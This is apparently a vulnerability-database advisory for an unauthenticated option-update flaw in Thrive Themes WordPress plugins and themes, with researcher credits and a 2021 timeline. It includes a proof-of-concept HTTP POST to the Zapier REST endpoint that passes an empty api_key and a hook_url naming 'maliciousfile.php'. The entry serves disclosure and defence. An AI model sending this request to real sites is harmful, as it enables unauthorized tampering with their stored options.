WordPress Plugin Vulnerabilities
All Thrive Themes and Plugins - Unauthenticated Option Update
Description
The plugins and themes register a REST API endpoint associated with Zapier functionality. While this endpoint was intended to require an API key in order to access, it was possible to access it by supplying an empty api_key parameter in vulnerable versions if Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.
Proof of Concept
POST /wp-json/td/v1/optin/subscription HTTP/1.1 Host: [URL] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 54 hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=
Affects Plugins
Affects Themes
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-24 (about 3 years ago)
Added
2021-03-24 (about 3 years ago)
Last Updated
2021-03-30 (about 3 years ago)